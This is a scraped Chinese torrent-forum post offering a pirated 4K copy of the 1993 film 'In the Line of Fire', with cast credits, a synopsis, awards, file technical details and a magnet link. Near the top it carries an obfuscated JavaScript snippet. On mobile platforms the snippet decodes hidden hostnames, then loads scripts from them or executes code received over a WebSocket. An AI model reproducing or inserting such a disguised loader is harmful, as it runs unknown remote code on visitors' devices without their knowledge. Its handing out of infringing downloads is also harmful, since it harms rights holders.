火线狙击[中文字幕].In.The.Line.Of.Fire.1993.2160p.4K迅雷下载 17.75GB

版主小s 1月前 235

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 火线狙击 / 火线大行动(台) / 火线追击 / 火线

◎片 名 In the Line of Fire

◎年 代 1993

◎产 地 美国

◎类 别 剧情 / 动作 / 惊悚

◎语 言 英语

◎上映日期 1993-07-09

◎IMDb链接 https://www.imdb.com/title/tt0107206/

◎豆瓣评分 7.3/10 (5241人评价)

◎豆瓣链接 https://movie.douban.com/subject/1295733/

◎片 长 128 分钟

◎导 演 沃尔夫冈·彼德森 Wolfgang Petersen (id:1032021)

◎编 剧 杰夫·马圭尔 Jeff Maguire (id:1290731)

◎演 员 克林特·伊斯特伍德 Clint Eastwood (id:1054436)

约翰·马尔科维奇 John Malkovich (id:1041013)

蕾妮·罗素 Rene Russo (id:1004610)

迪伦·麦克德莫特 Dylan McDermott (id:1040567)

盖瑞·科尔 Gary Cole (id:1049563)

弗雷德·多尔顿·汤普森 Fred Dalton Thompson (id:1022771)

约翰·马奥尼 John Mahoney (id:1054959)

格雷戈里·艾伦·威廉斯 Gregory Alan Williams (id:1350741)

克莱德·草津 Clyde Kusatsu (id:1103253)

史蒂夫·海特纳 Steve Hytner (id:1113993)

托宾·贝尔 Tobin Bell (id:1025219)

Bob Schott (id:1138338)

艾尔莎·瑞雯 Elsa Raven (id:1143955)

帕特里卡·达博 Patrika Darbo (id:1054850)

瑞安·库托纳 Ryan Cutrona (id:1068404)

布赖恩·利比 Brian Libby (id:1343305)

埃里克·布鲁斯科特尔 Eric Bruskotter (id:1078006)

Patrick Caddell (id:1045824)

约翰·赫德 John Heard (id:1031901)

Alan Toy (id:1019514)

Carl Ciarfalio (id:1069576)

沃尔特·麦克弗森 Walt MacPherson (id:1290677)

罗伯特·皮特斯 Robert Peters (id:1010758)

Anthony Peck (id:1126867)

里克·赫斯特 Rick Hurst (id:1112074)

约书亚·马林纳 Joshua Malina (id:1123776)

William G. Schilling (id:1141926)

Robert Alan Beuth (id:1063131)

苏姗·李·霍夫曼 Susan Lee Hoffman (id:1343717)

西尔克·科扎特 Cylk Cozart (id:1072399)

柯克乔丹 Kirk Jordan (id:1109281)

Elliott J. Brown (id:1255660)

Ian Paul Cassidy (id:1074724)

Aaron Michael Lacey (id:1019306)

史蒂夫·雷尔斯巴克 Steve Railsback (id:1041240)

William Shipman (id:1227833)

Michael Werckle (id:1164053)

大卫·瓦尔德 David Valdes (id:1299783)

恩尼奥·莫里康内 Ennio Morricone (id:1044688)

安妮·考特斯 Anne V. Coates (id:1037289)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

约翰·沃纳克 John Warnke (id:1300447)

莉莉·基尔弗特 Lilly Kilvert (id:1288534)

Erica Edell Phillips (id:1294458)

卡罗尔·A·奥康奈尔 Carol A. O'Connell (id:1293382)

Werner Keppler (id:1288426)

James Lee McCoy (id:1291498)

迈克尔·格里洛 Michael Grillo (id:1285490)

罗恩·布林克曼 Ron Brinkmann (id:1279321)

马克·A·拉索夫 Mark A. Lasoff (id:1289472)

布拉德·库恩 Brad Kuehn (id:1289086)

Chip Houghton (id:1286970)

罗伯特·M·格林伯格 Robert M. Greenberg (id:1285385)

杰罗姆·陈 Jerome Chen (id:1280567)

◎标 签 动作 / 美国 / 克林特·伊斯特伍德 / ClintEastwood / 特工 / 1993 / 悬疑 / 美国电影

◎简 介

肯尼迪总统的遇刺让身为他贴身保镖的弗兰克(克林特·伊斯特伍德ClintEastwood饰)陷入了自责的情绪中不能自拔。即使多年过去,但只要一想到此时,弗兰克总觉得是自己的失职和大意造成了这一悲剧。某一日,一个神秘的电话引起了他的警觉。打电话的男人名叫米奇(约翰·马尔科维奇JohnMalkovich饰),他告诉弗兰克,自己准备暗杀现任总统,并邀请弗兰克玩一个所谓的“游戏”,这个游戏的成败将直接影响总统的命运。

往事重演,这一次,弗兰克决定无论如何都要保护总统的安全。这个米奇到底是谁?他这么做的目的何在?在一连串的疑问面前,一场激烈而又危险的追杀游戏逐渐展开。

◎获奖情况 (共7项)

第66届奥斯卡金像奖 (1994)

最佳男配角(提名)

└──约翰·马尔科维奇 (id:1041013)

最佳原创剧本(提名)

└──杰夫·马圭尔 (id:1290731)

最佳剪辑(提名)

└──安妮·考特斯 (id:1037289)

第51届金球奖 (1994)

电影类 最佳男配角(提名)

└──约翰·马尔科维奇 (id:1041013)

第47届英国电影学院奖 (1994)

电影奖 最佳男配角(提名)

└──约翰·马尔科维奇 (id:1041013)

电影奖 最佳原创剧本(提名)

└──杰夫·马圭尔 (id:1290731)

电影奖 最佳剪辑(提名)

└──安妮·考特斯 (id:1037289)

  1. General

  2. Unique ID : 297299041825265533979409545827643231010 (0xDFA9B674170356DC7A3ADCC9DF770B22)

  3. Complete name : In.The.Line.Of.Fire.1993.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 17.7 GiB

  7. Duration : 2 h 8 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 19.7 Mb/s

  10. Movie name : In The Line Of Fire 1993 2160p HDR UHD BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-06-28 15:52:40

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 8 min

  22. Bit rate : 15.4 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.104

  32. Stream size : 13.8 GiB (78%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 2 h 8 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 239 kb/s

  54. Maximum bit rate : 7 251 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.81 GiB (21%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 2 h 5 min

  75. Bit rate : 37.2 kb/s

  76. Count of elements : 3176

  77. Stream size : 33.5 MiB (0%)

  78. Title : ENG

  79. Language : English

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 2 h 1 min

  89. Bit rate : 20.1 kb/s

  90. Count of elements : 2837

  91. Stream size : 17.5 MiB (0%)

  92. Title : CHS

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #3

  97. ID : 5

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 2 h 1 min

  103. Bit rate : 20.8 kb/s

  104. Count of elements : 2837

  105. Stream size : 18.1 MiB (0%)

  106. Title : CHT

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #4

  111. ID : 6

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 2 h 1 min

  117. Bit rate : 33.1 kb/s

  118. Count of elements : 3194

  119. Stream size : 28.7 MiB (0%)

  120. Title : CHS

  121. Language : Chinese

  122. Default : No

  123. Forced : No


  124. Text #5

  125. ID : 7

  126. Format : PGS

  127. Muxing mode : zlib

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 2 h 1 min

  131. Bit rate : 24.4 kb/s

  132. Count of elements : 1946

  133. Stream size : 21.2 MiB (0%)

  134. Title : CHT

  135. Language : Chinese

  136. Default : No

  137. Forced : No


  138. Menu

  139. 00:00:00.000 : en:Chapter 01

  140. 00:07:25.445 : en:Chapter 02

  141. 00:11:48.249 : en:Chapter 03

  142. 00:15:07.281 : en:Chapter 04

  143. 00:23:37.625 : en:Chapter 05

  144. 00:32:09.553 : en:Chapter 06

  145. 00:40:57.038 : en:Chapter 07

  146. 00:48:47.883 : en:Chapter 08

  147. 00:56:36.602 : en:Chapter 09

  148. 01:07:43.685 : en:Chapter 10

  149. 01:12:28.636 : en:Chapter 11

  150. 01:20:43.130 : en:Chapter 12

  151. 01:35:50.578 : en:Chapter 13

  152. 01:52:23.153 : en:Chapter 14

  153. 01:54:12.471 : en:Chapter 15

  154. 01:57:39.844 : en:Chapter 16



TAGS 动作 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:66A0E301827BAC66E919B32C720BCF8BEE1B0DFC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回